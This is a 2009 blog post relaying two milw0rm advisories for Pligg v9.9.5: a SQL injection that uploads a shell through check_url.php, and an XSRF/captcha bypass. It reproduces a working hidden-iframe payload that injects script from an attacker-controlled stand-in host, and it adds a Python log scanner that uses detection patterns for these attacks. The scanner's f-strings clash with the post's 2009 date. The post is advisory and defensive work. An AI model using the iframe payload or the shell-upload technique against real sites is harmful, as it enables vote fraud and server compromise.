2 New Pligg v9.9.5 Security Exploits Found

Two new security exploits have been found in the most used version of Pligg, v9.9.5. The first, reported in January, is a Pligg 9.9.5 Beta Perl exploit in the EVB check_url.php file; the second, discovered on the 29th January, is a captcha bypass exploit. More details below.

Because we did not post as much during January, we missed these two exploit reports from milw0rm relating to v9.9.5 of the Pligg system, which is likely the version most people are using.

22/12/2008 Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit

AUTHOR
discovered & written by Ams ax330d [doggy] gmail [dot] com

VULN. DESCRIPTION:
The vulnerability hides in 'evb/check_url.php', in the unfiltered $_GET['url'] parameter.
Actually, it has filtration.
The filtration strips tags and converts HTML special chars, but it is not enough, because we can use MySQL's CHAR() function to convert the shell to allowed chars.

EXPLOIT WORK:
Firstly, the exploit tries to get the full server path, but if it does not succeed, it will brute-force it. If the path has been found, the exploit will try to upload a tiny shell via SQL injection.

REQUIREMENTS:
MySQL should be able to write to files.
Know the full server path to the portal.
magic_quotes_gpc=off

milw0rm: Pligg 9.9.5 Beta Perl exploit

29/01/2009 XSRF Protection Bypass and Captcha Bypass

This vulnerability targets the CAPTCHA within Pligg.

XSRF Protection Bypass

<html>
<!--
Remove this iframe from this file and place it on a site that you want
to force people to vote for.
Change these pligg_story_to_vote_for, target_pligg_site and site_you_control .
-->
<iframe src='http://target_pligg_site/index.php?category="><script src=http://site_you_control/pligg_auto_voter.html
type=text/javascript></script>' width="0%" height="0%"></iframe>
</html>

If you're still using the 'default' captcha method you should switch to WhiteHat or reCaptcha, and remove the /ts_image.php file (if you have it). If you don't have the /ts_image.php file, then you're OK.
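Both reports above give an administrator something concrete to look for in the web server logs: requests to evb/check_url.php whose url parameter carries a MySQL CHAR() call, and any request for /ts_image.php after it has been removed. The following is an added example written for this post, not code from Pligg or from the milw0rm advisories; the log lines are constructed Apache combined-format samples, and the rule names and thresholds are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [17/Feb/2009:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Feb/2009:10:01:15 +0000] "GET /evb/check_url.php?url=http%3A%2F%2Fexample.com%2F HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Feb/2009:10:02:40 +0000] "GET /evb/check_url.php?url=%27+CHAR(49)+-- HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.8 - - [17/Feb/2009:10:03:01 +0000] "GET /ts_image.php?id=1 HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A call to MySQL's CHAR() function, case-insensitive; a legitimate URL has no reason to carry one.
CHAR_CALL = re.compile(r'\bCHAR\s*\(', re.IGNORECASE)


def parse_line(line):
    """Split one log line into fields; query values are URL-decoded by parse_qs."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the findings (rule names) that apply to a parsed request."""
    findings = []
    if rec["path"].endswith("/evb/check_url.php"):
        if any(CHAR_CALL.search(v) for v in rec["query"].get("url", [])):
            findings.append("check_url_char_in_url")   # filter bypass via CHAR(), per the first report
    if rec["path"].endswith("/ts_image.php"):
        findings.append("ts_image_request")            # legacy captcha file that should be gone
    return findings


def scan(log_text):
    """Yield (client ip, path, status, rule) for every suspicious request in the log."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            alerts.extend((rec["ip"], rec["path"], rec["status"], f) for f in classify(rec))
    return alerts
```

A 404 on ts_image.php after removal is harmless but still worth recording, since it shows who is probing for the old captcha path.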

milw0rm: XSRF Protection Bypass and Captcha Bypass


Author: Lincoln on February 17th, 2009

Category: Pligg
